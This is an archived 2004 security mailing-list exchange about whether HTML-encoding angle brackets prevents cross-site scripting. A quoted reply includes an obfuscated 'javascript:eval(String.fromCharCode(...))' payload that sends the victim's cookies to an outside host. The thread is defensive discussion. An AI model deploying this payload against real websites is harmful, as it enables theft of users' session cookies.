OSEC

Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com
 
Re: [Re: AppSec FAQ at OWASP]

From: Rohyt Belani (rohytbelanihotmail.com)
Date: Fri Jan 30 2004 - 09:43:28 CST

In-Reply-To: <02ca01c3e706$59b8f720$ec658009pprados>

>
>> An easier solution to prevent XSS attacks might be to HTML encode the "<"
>and ">" characters as &lt and &gt. So even if they are accepted as input
>from the user, it would not result in the execution of a script like
>&lt;script&gt;...&lt;/script&gt;.
>
>
>It's not correct. With this code :
><a href="<%= escapeHTML(url)%>/doc.html">Document</a>
>
>The hacker can inject in the variable url the value :
>javascript:eval(String.fromCharCode(60,115,99,114,105,112,116,62,110,101,119
>,32,73,109,97,103,101,40,41,46,115,114,99,61,34,104,116,116,112,58,47,47,112
>,105,114,97,116,101,46,111,114,103,47,118,111,108,101,99,111,111,107,105,101
>,46,106,115,112,63,99,61,34,43,101,115,99,97,112,101,40,100,111,99,117,109,1
>01,110,116,46,99,111,111,107,105,101,41,59,60,47,115,99,114,105,112,116,62))
>and execute a script without <, > or &!
>
>Phil
>

The solution I proposed for HTML encoding characters like < and > will still be effective in the case you mentioned.
This is because the underlying principle for good input validation routines is to first decode the encoded URL and then perform input validation. By doing so all encoding attacks like the one you mentioned can be prevented from executing successfully.
>